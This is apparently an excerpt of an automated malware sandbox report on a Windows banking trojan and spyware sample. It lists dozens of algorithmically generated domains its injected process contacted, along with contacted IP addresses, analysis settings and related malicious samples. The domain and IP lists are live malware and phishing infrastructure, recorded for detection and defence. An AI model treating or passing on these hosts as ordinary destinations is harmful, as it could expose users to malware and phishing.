                                                                                                                                                                                                          http://vowykaf.com/login.phpsvchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1702355410.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710889329.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1487225312.0000000008B16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qetynev.com/login.phpsvchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1768332596.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533888500.0000000008AFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://puzytap.com/login.phpsvchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qegyval.com/login.phpsvchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1702355410.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498623748.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710718578.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710622766.0000000000883000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1508538530.0000000008A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711822225.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711907800.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1486308101.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1486513335.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710889329.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711574837.000000000089E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qetyxiq.com/svchost.exe, 00000002.00000003.1665250528.0000000000884000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lyxymin.com/svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://vopygat.com/login.phpsvchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1545631030.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1537002580.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533884636.0000000002F7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1539305897.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lygyxux.com/login.phpsvchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1610082181.0000000008B24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1613723889.0000000008B28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1608386340.0000000002FA1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2143261512.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2617654606.0000000002FCD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2627419955.0000000008BE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1606037853.0000000008B24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://gacycaz.com/login.phpsvchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2048442631.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://pumyjip.com/login.php?svchost.exe, 00000002.00000002.2604355342.0000000000812000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://gahycuz.com/Psvchost.exe, 00000002.00000003.2481161521.0000000008A6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623816509.0000000008A6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://gadyhoh.com/login.phpsvchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://galyhib.com/login.phpsvchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://gahynuw.com/login.phpsvchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2110053905.000000000D64A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595141664.000000000089D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://gadydow.com/login.phpsvchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2142459408.0000000002F1D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595141664.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615554415.0000000002F1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qeqyxyp.com/login.phpsvchost.exe, 00000002.00000003.1538642409.0000000008A8F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1539162244.0000000008A8F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1537002580.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1538616359.0000000008A89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1768332596.0000000008B75000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://106.15.232.163:8000/dh/147287063_134827.html#index8?d=lyrysor.comsvchost.exe, 00000002.00000003.1684990918.0000000008BC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665016575.0000000008AE9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1661256146.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lyxynyx.com/login.phpnsvchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://purylup.com/svchost.exe, 00000002.00000003.1556061520.0000000008A14000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qegyfyp.com/login.phpsvchost.exe, 00000002.00000003.1433180405.0000000002F82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664665430.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1661335994.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433247007.0000000008B0A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432691608.0000000002F7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                            http://vojycec.com/svchost.exe, 00000002.00000003.1859997516.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559578676.0000000008AA8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841242367.0000000008AA0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560390344.0000000008AA8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559905278.0000000008AA8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878418467.0000000008AD6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://galyfis.com/svchost.exe, 00000002.00000003.1800870882.0000000008AA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://www.google.comtnlsvchost.exe, 00000002.00000003.1782288981.000000000D6C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1888650263.000000000D6C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://pujygug.com/login.phpsvchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://pujydap.com/login.phpsvchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://lykymij.com/login.phpsvchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1592136244.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://lysyvan.com/login.phpsvchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1471391644.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1661335994.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433247007.0000000008B0A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664161481.0000000002FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://purywoq.com/svchost.exe, 00000002.00000003.2481161521.0000000008A6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623273895.0000000008A15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2483228275.0000000008ACE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2624819557.0000000008ACF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2139975711.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623816509.0000000008A6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://lykyfen.com/login.phpsvchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1702355410.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498623748.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1512365775.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711907800.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1486513335.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710889329.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://lykywid.com/login.phpsvchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://vopycyf.com/login.phpsvchost.exe, 00000002.00000003.1545295076.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1544887919.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1542434740.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1539305897.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://pumydyg.com/login.phpsvchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://qexylup.com/login.phpsvchost.exe, 00000002.00000003.1411284154.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1610082181.0000000008B24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1389905582.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1615937487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1402185075.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1613723889.0000000008B28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1411345133.0000000002F34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1401679434.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1841589649.0000000001139000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008EEC000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.00000000014FC000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.2054776037.00000000093A0000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2086886336.0000000009561000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.1859768092.000000000147F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.000000000936A000.00000004.00000001.00020000.00000000.sdmp, 
ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1919088226.0000000008414000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.0000000000838000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1804176921.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.1826196829.0000000000C79000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.2033815046.000000000881B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://lysyxuj.com/login.phpsvchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://pupylug.com/psvchost.exe, 00000002.00000003.1859997516.0000000002FAB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://gacykas.com/login.phpsvchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://vocymak.com/login.phpsvchost.exe, 00000002.00000003.1556061520.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841242367.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1800870882.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547357675.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://gatyveh.com/login.phpsvchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104244256.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1587336760.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1587864442.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                                                                                                                                                                            16509AMAZON-02UStrue
                                                                                                                                                                                                            18.208.156.248
                                                                                                                                                                                                            pupycag.comUnited States
                                                                                                                                                                                                            14618AMAZON-AESUStrue
                                                                                                                                                                                                            208.100.26.245
                                                                                                                                                                                                            lyvyxor.comUnited States
                                                                                                                                                                                                            32748STEADFASTUStrue
                                                                                                                                                                                                            199.59.243.227
                                                                                                                                                                                                            77026.bodis.comUnited States
                                                                                                                                                                                                            395082BODIS-NJUSfalse
                                                                                                                                                                                                            103.224.182.252
                                                                                                                                                                                                            vofycot.comAustralia
                                                                                                                                                                                                            133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                                                                                                                                                                                            178.162.203.211
                                                                                                                                                                                                            unknownGermany
                                                                                                                                                                                                            28753LEASEWEB-DE-FRA-10DEtrue
                                                                                                                                                                                                            85.17.31.82
                                                                                                                                                                                                            gatyfus.comNetherlands
                                                                                                                                                                                                            60781LEASEWEB-NL-AMS-01NetherlandsNLtrue
                                                                                                                                                                                                            44.221.84.105
                                                                                                                                                                                                            gadyciz.comUnited States
                                                                                                                                                                                                            14618AMAZON-AESUStrue
                                                                                                                                                                                                            154.212.231.82
                                                                                                                                                                                                            gadyniw.comSeychelles
                                                                                                                                                                                                            133201COMING-ASABCDEGROUPCOMPANYLIMITEDHKtrue
                                                                                                                                                                                                            188.114.96.3
                                                                                                                                                                                                            lysyvan.comEuropean Union
                                                                                                                                                                                                            13335CLOUDFLARENETUStrue
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1553805
Start date and time: 2024-11-11 18:06:41 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 15s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 13
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: uavINoSIQh.exe (renamed because original name is a hash value)
Original Sample Name: 6cfcadc2ed5bb29ee8a1ff27c5b04c2481ee1e77.exe
Detection: MAL
Classification: mal100.bank.troj.spyw.expl.evad.winEXE@10/50@2167/24
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 118
• Number of non-executed functions: 197
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 2.23.209.189, 2.23.209.144, 2.23.209.187, 2.23.209.135, 2.23.209.149, 2.23.209.141, 2.23.209.140, 2.23.209.133, 2.23.209.130, 2.23.209.158, 2.23.209.154, 2.23.209.150, 40.126.31.69, 20.190.159.23, 20.190.159.4, 20.190.159.2, 40.126.31.67, 20.190.159.0, 20.190.159.75, 20.190.159.71, 104.208.16.94, 2.23.209.143, 2.23.209.156, 2.23.209.137, 20.189.173.20, 52.168.117.173, 2.23.209.179, 2.23.209.177, 2.23.209.182, 2.23.209.176, 2.23.209.181
                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): www.bing.com, onedsblobprdeus16.eastus.cloudapp.azure.com, prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, www.tm.v4.a.prd.aadg.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, www-www.bing.com.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, e86303.dscx.akamaiedge.net, www.bing.com.edgekey.net, login.live.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net, onedsblobprdcus16.centralus.cloudapp.azure.com
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: uavINoSIQh.exe
Time | Type | Description
12:08:20 | API Interceptor | 7x Sleep call for process: WerFault.exe modified
12:08:39 | API Interceptor | 465777x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                            • ww1.icodeps.com/?usid=27&utid=6773648594
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                            • 118.31.219.198
                                                                                                                                                                                                            yakuza.arm4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 47.126.44.187
                                                                                                                                                                                                            botnet.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                            • 47.112.29.92
                                                                                                                                                                                                            botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                            • 139.251.190.28
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| 37f463bf4616ecd445d4a1937da06e19 | 7DAKMhINGk.exe | malicious | Simda Stealer | 99.83.170.3, 188.114.96.3 |
| | 11315781264#U00b7pdf.vbs | malicious | Remcos, GuLoader | 99.83.170.3, 188.114.96.3 |
| | P52mX04112024145925383.exe | malicious | FormBook, GuLoader | 99.83.170.3, 188.114.96.3 |
| | Factura Honorarios 2024-11-04.exe | malicious | GuLoader, Snake Keylogger | 99.83.170.3, 188.114.96.3 |
| | CERTIFICADO TITULARIDAD.exe | malicious | GuLoader, Snake Keylogger | 99.83.170.3, 188.114.96.3 |
| | Anfrage.exe | malicious | FormBook, GuLoader | 99.83.170.3, 188.114.96.3 |
